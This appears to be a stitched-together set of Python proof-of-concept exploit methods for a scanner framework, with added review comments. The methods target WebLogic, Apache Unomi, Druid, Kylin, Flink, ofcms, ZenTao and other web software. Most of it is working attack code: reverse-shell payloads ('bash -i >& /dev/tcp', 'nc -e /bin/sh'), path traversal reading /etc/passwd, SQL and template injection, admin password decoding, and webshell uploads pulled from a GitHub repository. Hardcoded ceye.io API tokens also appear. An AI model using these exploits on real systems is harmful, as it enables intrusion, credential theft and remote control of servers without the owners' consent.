def _verify(self):
        """Out-of-band verification against the /wls-wsat/CoordinatorPortType path.

        Posts ``payload`` to ``veri_url`` and then polls the ceye.io records API
        for an HTTP request to ``check_host/random_uri``.  ``result`` carries
        ``VerifyInfo`` only when such a record is found; the method returns
        ``self.parse_output(result)`` in every case.
        """
        result = {}

        veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
        # Per-run random path segment so the callback can be attributed to this check.
        random_uri = random_str(16)
        # NOTE(review): the OOB listener host is a hardcoded personal ceye.io
        # subdomain; the other examples take the CEye token from self.token, and
        # this value should likewise come from configuration.
        check_host = 'zum76x.ceye.io'
        check_port = 80
        payload = self.get_check_payload(check_host, check_port, random_uri)
        headers = {
            "Content-Type":
            "text/xml;charset=UTF-8",
            "User-Agent":
            "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        }

        try:
            requests.post(veri_url, data=payload, headers=headers)
            # NOTE(review): the ceye API token below is a live credential committed
            # in source (same issue in the AsyncResponseService example); it belongs
            # in config/env and should be rotated.
            resp = requests.get(
                'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request'
            )
            # Used as a regex: the dots in check_host are unescaped, so the match is
            # slightly looser than a literal URL comparison.
            pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port,
                                                     random_uri)
            if re.search(pattern, resp.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            # Broad catch: any network or parsing failure is reduced to a warning and
            # an empty result.  Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
        return self.parse_output(result)
    def _shell(self):
        """Send one request carrying a reverse-shell command to /context.json.

        The command is base64-wrapped into a ``bash -c`` one-liner and embedded
        in ``pocjson``.  ``result`` is never populated, so
        ``self.parse_attack(result)`` always receives an empty dict, and the
        response ``r2`` is not inspected.
        """
        result = {}
        # Send the reverse-shell request.
        pocurl = self.url + '/context.json'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): a fixed Content-Length cannot match the real body size;
            # requests normally recomputes it from the body -- confirm, and drop it.
            'Content-Length': '1003',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        IP = get_listener_ip()
        PORT = get_listener_port()
        # IP = yourlistenerip
        # PORT = yourlistenerport
        payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
        try:
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS verification disabled; original note "execute the ping command" is a stale copy-paste
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))

        return self.parse_attack(result)
    def _shell(self):
        """Send one request carrying a reverse-shell command to the sampler endpoint.

        Embeds ``payload`` in the ``javascript`` filter of the ``pocjson`` body.
        ``result`` is never populated, so ``self.parse_attack(result)`` always
        receives an empty dict, and the response ``r2`` is not inspected.
        """
        result = {}
        # Send the reverse-shell request.
        pocurl = self.url + '/druid/indexer/v1/sampler?for=filter'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): fixed Content-Length cannot match the real body size;
            # requests normally recomputes it -- confirm, and drop it.
            'Content-Length': '1003',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        # NOTE(review): yourlistenIP / yourlistenPORT are not defined in this
        # block; unless the module defines them this raises NameError before the
        # try block.  The sibling examples use get_listener_ip()/get_listener_port().
        IP = yourlistenIP
        PORT = yourlistenPORT
        # PORT is concatenated without str(), so it must already be a string here.
        payload = 'nc ' + IP + ' ' + PORT + ' -e /bin/sh'
        pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'
        try:
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS verification disabled; original note "execute the ping command" is a stale copy-paste
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))

        return self.parse_attack(result)
 def _verify(self):
     """Out-of-band check through the /kylin/api/diag/project/.../download path.

     Logs in, builds a ``curl`` command that resolves ``random_uri`` under the
     CEye subdomain, places it in the URL path and asks CEye whether the lookup
     arrived.  Returns ``self.parse_output(result)``.
     """
     result = {}
     cookies = self.login()
     CEye_main = CEye(token=self.token)
     ceye_subdomain = CEye_main.getsubdomain()
     # Per-run random label so the DNS/HTTP record can be attributed to this check.
     random_uri = random_str(16)
     logger.info("random_url为:%s" % random_uri)
     verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
     veri_url = urljoin(
         self.url, '/kylin/api/diag/project/%7c%7c' + verify_payload +
         '%7c%7c/download')
     headers = {
         "Content-Type": "text/xml;charset=UTF-8",
         "User-Agent":
         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
         "Cookie": cookies
     }
     # NOTE(review): this writes the session Cookie into the info log; session
     # credentials should not be logged.
     logger.info("Headres如下:")
     logger.info(headers)
     try:
         # resp itself is never inspected; only the OOB record decides the outcome.
         resp = requests.get(veri_url, headers=headers)
         if CEye_main.verify_request(random_uri):
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = verify_payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
    def _shell(self):
        """Send one request carrying a reverse-shell command to /context.json.

        Same structure as the other ``/context.json`` example, but the command is
        embedded in an OGNL-style ``propertyName`` expression instead of a
        ``script::`` condition.  ``result`` is never populated, so
        ``self.parse_attack(result)`` always receives an empty dict.
        """
        result = {}
        # Send the reverse-shell request.
        pocurl = self.url + '/context.json'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): fixed Content-Length cannot match the real body size;
            # requests normally recomputes it -- confirm, and drop it.
            'Content-Length': '1003',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        IP = get_listener_ip()
        PORT = get_listener_port()
        # IP = yourlistenerip
        # PORT = yourlistenerport
        payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
        try:
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS verification disabled; original note "execute the ping command" is a stale copy-paste
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))

        return self.parse_attack(result)
 def _attack(self):
     """Fetch a file through the xyhai.php downFile path traversal.

     Uses the ``filename`` option (default ``App\\Common\\Conf\\db.php``) and
     the ``PHPSESSID`` option as the session cookie.  On HTTP 200 without the
     error marker the decoded body is stored under ``File_Content``.
     Returns ``self.parse_output(result)``.
     """
     result = {}
     try:
         # NOTE(review): this marker is the Flink JobManager message used by the
         # /jobmanager/logs examples; the xyhai.php _verify example checks for
         # "该文件不存在" instead.  Likely a copy-paste leftover -- confirm.
         Flag_error = "This file does not exist in JobManager log dir"
         if self.get_option("filename"):
             # Forward slashes are rewritten to a doubled backslash for the path.
             attack_filename = self.get_option("filename").replace(
                 '/', '\\\\')
         else:
             attack_filename = 'App\\Common\\Conf\\db.php'
         logger.info("下载文件为:" + attack_filename)
         attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip'
         attack_url = self.url + attack_payload
         logger.info(attack_url)
         cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
         attack_res = requests.get(attack_url,
                                   cookies=cookies,
                                   verify=False)  # TLS verification disabled
         # .decode() without an explicit encoding assumes UTF-8 response bytes.
         if attack_res.status_code == 200 and Flag_error not in attack_res.content.decode(
         ):
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = attack_url
             result['VerifyInfo']['Payload'] = attack_payload
             result['VerifyInfo'][
                 'File_Content'] = '\n' + attack_res.content.decode()
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def login(self):
     """Log in to ofcms-admin and return a ``JSESSIONID=...`` cookie string.

     Posts the ``username``/``password`` options as JSON to
     ``/ofcms-admin/admin/dologin.json``.

     NOTE(review): ``cookie`` is assigned only on the success path, so a failed
     login (non-200, wrong ``code``, or an exception) reaches ``return cookie``
     with the name unbound and raises UnboundLocalError.  ``headers`` is built
     but never passed to ``requests.post``.
     """
     login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json')
     post_data = {
         "username": self.get_option("username"),
         "password": self.get_option("password")
     }
     # Unused: the request below is sent without these headers.
     headers = {
         "Content-Type":
         "application/json; charset=UTF-8",
         "User-Agent":
         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
     }
     try:
         resp = requests.post(login_url, data=json.dumps(post_data))
         # The server's code is compared as the string '200', not the int.
         if resp.status_code == 200 and json.loads(
                 resp.text)['code'] == '200':
             cookies = requests.utils.dict_from_cookiejar(resp.cookies)
             # KeyError here if the server sets no JSESSIONID (caught below).
             cookie = "JSESSIONID=" + cookies["JSESSIONID"]
             # NOTE(review): writes the session credential into the info log.
             logger.info("获得的Cookie为:%s" % cookie)
             logger.info("Ofcms系统登录成功")
         else:
             logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text))
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(e)
         logger.warn("Ofcms系统登录失败")
     return cookie
 def _verify(self):
     """Error-based check against the ofcms generate/create.json endpoint.

     Logs in, sends ``verify_payload`` in the ``sql`` form field and looks for
     ``~random_uri~`` echoed back in the response body.  Returns
     ``self.parse_output(result)``.
     """
     result = {}
     cookies = self.login()
     # Per-run random marker so the echoed value is unambiguous.
     random_uri = random_str(16)
     logger.info("random_uri为:%s" % random_uri)
     verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
     post_data = {"sql": verify_payload}
     veri_url = urljoin(
         self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
     headers = {
         "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
         "User-Agent":
         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
         "Cookie": cookies
     }
     # NOTE(review): this writes the session Cookie into the info log; session
     # credentials should not be logged.
     logger.info("Headres如下:")
     logger.info(headers)
     try:
         resp = requests.post(veri_url, data=post_data, headers=headers)
         # 0x7e is '~'; the marker is the random value wrapped in tildes.
         flag = "~" + random_uri + "~"
         if flag in resp.text:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = verify_payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _verify(self):
     """Out-of-band DNS check against the /_async/AsyncResponseService path.

     Posts ``payload`` (built by ``self.get_check_payload``) and then asks the
     ceye.io records API whether a DNS lookup for ``cmd`` was seen.  Returns
     ``self.parse_output(result)``.
     """
     result = {}
     veri_url = urljoin(self.url, '/_async/AsyncResponseService')
     # NOTE(review): the OOB domain is a hardcoded personal ceye.io subdomain;
     # the other examples take the CEye token from self.token.
     cmd = random_str(16) + '.6eb4yw.ceye.io'
     payload = self.get_check_payload(cmd)
     headers = {
         'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
         'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
         'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
         'Accept-Encoding': "gzip, deflate",
         'Cookie': "sidebar_collapsed=false",
         'Connection': "close",
         'Upgrade-Insecure-Requests': "1",
         'Content-Type': "text/xml",
         # NOTE(review): fixed Content-Length cannot match the real body size;
         # requests normally recomputes it -- confirm, and drop it.
         'Content-Length': "1001",
         'cache-control': "no-cache"
     }
     try:
         requests.post(veri_url, data=payload, headers=headers)
         # NOTE(review): live ceye API token committed in source (same issue in
         # the wls-wsat example); move to config/env and rotate.
         res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
         if cmd in res.text:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
    def _verify(self):
        """Read privilege.xml via the ReportServer path and decode the admin password.

        Extracts ``rootManagerName`` / ``rootManagerPassword`` from the response,
        XOR-decodes the password with ``PASSWORD_MASK_ARRY`` and stores both under
        ``result['AdminInfo']``.  Returns ``self.parse_output(result)``.

        NOTE(review): the decoded credential ends up in the result object; treat
        that output as sensitive.
        """
        result = {}
        veri_url = self.url + '/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml'

        try:
            resp = requests.get(veri_url)
            # 'patrern2' is a typo for 'pattern2' (harmless, but inconsistent).
            pattern1 = r"<rootManagerPassword>.*</rootManagerPassword>"
            patrern2 = r"<rootManagerName>.*</rootManagerName>"
            # str(bytes) yields the "b'...'" repr; the regexes still match inside it.
            r2 = re.search(patrern2, str(resp.content))
            r1 = re.search(pattern1, str(resp.content))
            # If either search returned None this raises AttributeError, which is
            # swallowed by the broad except below.  The slice offsets assume a
            # fixed wrapper around each value (tag plus, presumably, CDATA) -- confirm.
            username = r2.group(0)[28:-21]
            cipher = r1.group(0)[32:-25]
            PASSWORD_MASK_ARRY = [19, 78, 10, 15, 100, 213, 43, 23]
            password = ""
            # Drop a 3-character prefix, then decode 4-hex-digit groups XORed with
            # the repeating 8-entry mask.
            cipher = cipher[3:]
            for i in range(int(len(cipher) / 4)):
                p1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
                p2 = p1 ^ PASSWORD_MASK_ARRY[i % 8]
                password = password + chr(p2)
            # The status check happens only after parsing; a non-200 body is
            # usually rejected earlier by the None-group AttributeError.
            if resp.status_code == 200 and password:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['AdminInfo'] = {}
                result['AdminInfo']["UserName"] = username
                result['AdminInfo']["Password"] = password
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
        return self.parse_output(result)
 def _shell(self):
     """Send the ``command`` option to /web/dsdk/DsdkProxy.php after a priming GET.

     The command is wrapped as ``';<cmd>;'`` and posted with a fixed
     ``isAdmin=1;username=admin`` cookie.  Unlike the other ``_shell`` examples
     this method returns nothing and does not inspect either response.
     """
     veri_url1 = urljoin(
         self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
     veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
     cmd = self.get_option("command")
     data = "';{};'".format(cmd)
     headers = {'cookie': 'isAdmin=1;username=admin'}
     try:
         requests.get(veri_url1)
         requests.post(veri_url2, data=data, headers=headers)
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
    def _shell(self):
        """Post a reverse-shell payload to /wls-wsat/CoordinatorPortType.

        The command string is HTML-entity escaped (``&gt;``, ``&amp;``) because it
        is embedded in an XML body by ``self.get_shell_payload``.  Returns nothing
        and does not inspect the response.
        """
        vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
        cmd = 'bash -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1'.format(
            get_listener_ip(), get_listener_port())
        shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
        headers = {
            "Content-Type": "text/xml;charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        }

        try:
            requests.post(vul_url, data=shell_payload, headers=headers)
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
 def _verify(self):
     """Check the /jobmanager/logs double-encoded path traversal with /etc/hosts.

     On HTTP 200 without the JobManager error marker, the decoded body is stored
     under ``File_Content``.  Returns ``self.parse_output(result)``.
     """
     result = {}
     try:
         Flag_error = "This file does not exist in JobManager log dir"
         # '%252f' is a double URL-encoded '/'.
         verify_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts'
         verify_url = self.url + verify_payload
         logger.info(verify_url)
         verify_res = requests.get(verify_url,verify=False)  # TLS verification disabled
         # .decode() without an explicit encoding assumes UTF-8 response bytes.
         if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = verify_url
             result['VerifyInfo']['Payload'] = verify_payload
             result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
    def _verify(self):
        """Verify DsdkProxy.php command execution by reading /proc/cpuinfo.

        Sends a priming GET, posts ``cat /proc/cpuinfo`` wrapped as ``';<cmd>;'``
        and looks for cpuinfo keywords in the response.  Returns
        ``self.parse_verify(result)`` -- note the other examples on this page
        call ``parse_output``; confirm which name the base class provides.
        """
        result = {}

        veri_url1 = urljoin(
            self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
        veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
        cmd = 'cat /proc/cpuinfo'
        data = "';{};'".format(cmd)
        headers = {'cookie': 'isAdmin=1;username=admin'}
        try:
            requests.get(veri_url1)
            resp = requests.post(veri_url2, data=data, headers=headers)
            if any(keyword in resp.text for keyword in
                   ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
                result['VerifyInfo'] = {}
                # Records the base URL rather than veri_url2.
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
        return self.parse_verify(result)
 def _verify(self):
     """Check template injection in /search.php by evaluating ``phpinfo()``.

     Looks for ``allow_url_include`` (a phpinfo() page marker) in the response.
     Returns ``self.parse_output(result)``.
     """
     result = {}
     phpcode = "phpinfo()"
     flagText = "allow_url_include"
     verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)" + phpcode + ";if(1}{end if}"
     veri_url = urljoin(self.url, '/search.php')
     headers = {
         "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
         "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
     }
     try:
         resp = requests.post(veri_url,data=verify_payload,headers=headers)
         if flagText in resp.text:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = verify_payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _shell(self):
     """Trigger the client download feature with a remote file URL, then fetch it.

     ``result`` is never populated, so ``self.parse_output(result)`` always
     receives an empty dict; neither response is inspected.

     NOTE(review): the file is fetched at runtime from an unpinned third-party
     GitHub URL -- whatever that repository serves is what gets written.
     """
     result = {}
     random_uri = random_str(16)
     try:
         shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
         base64_payload = base64.b64encode(shell_payload.encode())
         shell_content = base64_payload.decode()
         shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
         # Debug print to stdout; the rest of the file uses logger.
         print(shell_url)
         cookies = {
             "zentaosid": self.get_option("zentaosid")
         }
         down_res = requests.get(shell_url,cookies=cookies)
         shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
         logger.info("webshell地址:" + shell_info_url)
         shell_res = requests.get(shell_info_url,cookies=cookies)
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _verify(self):
     """Check the xyhai.php downFile path traversal by fetching xyhai.php itself.

     Uses the ``PHPSESSID`` option as the session cookie.  On HTTP 200 without
     the "该文件不存在" (file does not exist) marker, the decoded body is stored
     under ``File_Content``.  Returns ``self.parse_output(result)``.
     """
     result = {}
     try:
         Flag_error = "该文件不存在"
         verify_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\xyhai.php/type/zip'
         verify_url = self.url + verify_payload
         logger.info(verify_url)
         cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
         verify_res = requests.get(verify_url,
                                   cookies=cookies,
                                   verify=False)  # TLS verification disabled
         # .decode() without an explicit encoding assumes UTF-8 response bytes.
         if verify_res.status_code == 200 and Flag_error not in verify_res.content.decode(
         ):
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = verify_url
             result['VerifyInfo']['Payload'] = verify_payload
             result['VerifyInfo'][
                 'File_Content'] = '\n' + verify_res.content.decode()
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _attack(self):
     """Fetch a chosen file through the /jobmanager/logs path traversal.

     The ``filename`` option (default ``/etc/passwd``) is URL-encoded twice to
     match the ``%252f`` traversal prefix.  On HTTP 200 without the JobManager
     error marker the decoded body is stored under ``File_Content``.  Returns
     ``self.parse_output(result)``.
     """
     result = {}
     try:
         Flag_error = "This file does not exist in JobManager log dir"
         if self.get_option("filename"):
             # Double quote(): the endpoint decodes the path twice.
             attack_filename = quote(quote(self.get_option("filename"),'utf-8'))
         else:
             attack_filename = quote(quote("/etc/passwd",'utf-8'))
         logger.info("下载文件为:" + attack_filename)
         attack_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..' + attack_filename
         attack_url = self.url + attack_payload
         logger.info(attack_url)
         attack_res = requests.get(attack_url,verify=False)  # TLS verification disabled
         # .decode() without an explicit encoding assumes UTF-8 response bytes.
         if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = attack_url
             result['VerifyInfo']['Payload'] = attack_payload
             result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _verify(self):
     """Out-of-band XXE check: post a DTD with an external entity to ``self.url``.

     The entity points at ``http://<ceye_subdomain>/<random_uri>``; CEye is then
     asked whether that request arrived.  Returns ``self.parse_output(result)``.
     """
     result = {}
     CEye_main = CEye(token=self.token)
     ceye_subdomain = CEye_main.getsubdomain()
     # Per-run random path segment so the callback can be attributed to this check.
     random_uri = random_str(16)
     logger.info("random_url为:%s" % random_uri)
     # '%%' is a literal '%' because the string is %-formatted below.
     verify_payload = """<?xml version="1.0" encoding="utf-8"?>
                         <!DOCTYPE root [
                         <!ENTITY %% xxe SYSTEM "http://%s/%s">
                         %%xxe;
                         ]>""" % (ceye_subdomain,random_uri)
     # NOTE(review): these are informational messages logged at warning level;
     # logger.info would be the consistent choice.
     logger.warn(verify_payload)
     veri_url = self.url
     logger.warn(veri_url)
     headers = {
         "Content-Type": "text/xml",
         "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
         "SOAPAction": "aaa"
     }
     try:
         # resp is never inspected; only the OOB record decides the outcome.
         resp = requests.post(veri_url,data=verify_payload,headers=headers)
         if CEye_main.verify_request(random_uri):
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = verify_payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _attack(self):
     """Trigger the client download feature with a remote file URL, then verify it.

     The file is fetched back from ``/data/client/<random_uri>/php_attack.php``
     and the result is recorded only when the response carries the expected
     marker string.  Returns ``self.parse_output(result)``.

     NOTE(review): the file is fetched at runtime from an unpinned third-party
     GitHub URL -- whatever that repository serves is what gets written.
     """
     result = {}
     random_uri = random_str(16)
     try:
         attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php'
         base64_payload = base64.b64encode(attack_payload.encode())
         attack_content = base64_payload.decode()
         attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content
         logger.info(attack_url)
         cookies = {
             "zentaosid": self.get_option("zentaosid")
         }
         # down_res is never inspected.
         down_res = requests.get(attack_url,cookies=cookies)
         attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php'
         attack_res = requests.get(attack_info_url,cookies=cookies)
         if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() :
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = attack_info_url
             result['VerifyInfo']['Payload'] = attack_payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def _verify(self):
     """Verify the client download feature with a harmless remote text file.

     Same flow as the ``_attack`` variant, but fetches ``php_verify.txt`` and
     checks for the literal ``md5('3.1416');`` in the stored copy.  Returns
     ``self.parse_output(result)``.

     NOTE(review): the file is fetched at runtime from an unpinned third-party
     GitHub URL.
     """
     result = {}
     random_uri = random_str(16)
     try:
         verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt'
         base64_payload = base64.b64encode(verify_payload.encode())
         verify_content = base64_payload.decode()
         verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content
         logger.info(verify_url)
         cookies = {
             "zentaosid": self.get_option("zentaosid")
         }
         # down_res is never inspected.
         down_res = requests.get(verify_url,cookies=cookies)
         verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt'
         verify_res = requests.get(verify_info_url,cookies=cookies)
         if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() :
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = verify_info_url
             result['VerifyInfo']['Payload'] = verify_payload
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
     return self.parse_output(result)
 def login(self):
     """Log in to /kylin/api/user/authentication and return a ``JSESSIONID=...`` string.

     Sends the ``username``/``password`` options as HTTP Basic credentials.

     NOTE(review): ``cookie`` is assigned only on the 200 path, so a 401, any
     other status, or an exception reaches ``return cookie`` with the name
     unbound and raises UnboundLocalError.  A 401 is also logged twice (the
     dedicated message, then the generic ``else`` branch).
     """
